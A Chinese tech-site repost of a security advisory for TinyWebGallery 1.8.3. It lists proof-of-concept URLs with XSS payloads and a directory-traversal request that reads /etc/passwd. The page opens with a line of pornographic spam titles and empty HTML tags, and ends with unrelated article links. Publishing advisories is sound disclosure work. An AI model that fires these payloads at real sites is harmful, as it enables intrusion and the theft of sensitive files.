一级毛片免费不卡在线视频,国产日批视频免费在线观看,菠萝菠萝蜜在线视频免费视频,欧美日韩亚洲无线码在线观看,久久精品这里精品,国产成人综合手机在线播放,色噜噜狠狠狠综合曰曰曰,琪琪视频

<strong id="bimi4"></strong>

<menuitem id="bimi4"></menuitem>

<noframes id="bimi4">

<abbr id="bimi4"></abbr>

<center id="bimi4"><progress id="bimi4"><dd id="bimi4"></dd></progress></center>

電腦資料

我要投稿投訴建議

TinyWebGallery 1.8.3版多個安全漏洞漏洞預(yù)警 -電腦資料

電腦資料時間：2019-01-01 我要投稿

【www.oriental01.com - 電腦資料】

TinyWebGallery是一款php相冊程序，TinyWebGallery 1.8.3中包含多個安全漏洞，包括目錄遍歷和XSS，可能導(dǎo)致敏感信息泄露，

TinyWebGallery 1.8.3版多個安全漏洞漏洞預(yù)警

。

[+]info:

~~~~~~~~~

Script. TinyWebGallery

Version: 1.8.3 (No fixes yet, might work on other versions too).

Home: http://www.tinywebgallery.com

[+]poc:

~~~~~~~~~

http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"

http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"

http://localhost/twg183/admin/index.php?dir=

http://localhost/twg183/admin/index.php?action=chmod&item=

http://localhost/twg183/twg183/admin/index.php?action=chmod&item=">

http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

[+]Reference:

~~~~~~~~~

http://www.exploit-db.com/exploits/16090

相關(guān)文章

最新文章

折半查找算法的實現(xiàn) -電腦資料
回調(diào)函數(shù)應(yīng)用（冒泡排序既排整
thinkphp 關(guān)于iis上面中文參數(shù)亂
自定義SectionAdapter顯示數(shù)據(jù) -
java克隆對象clone()的用法和作
static, enum, 內(nèi)部類與單例模式
Java多線程學(xué)習(xí)（吐血超詳細(xì)總結(jié)
Java中幾個容易混淆的相似概念和

推薦文章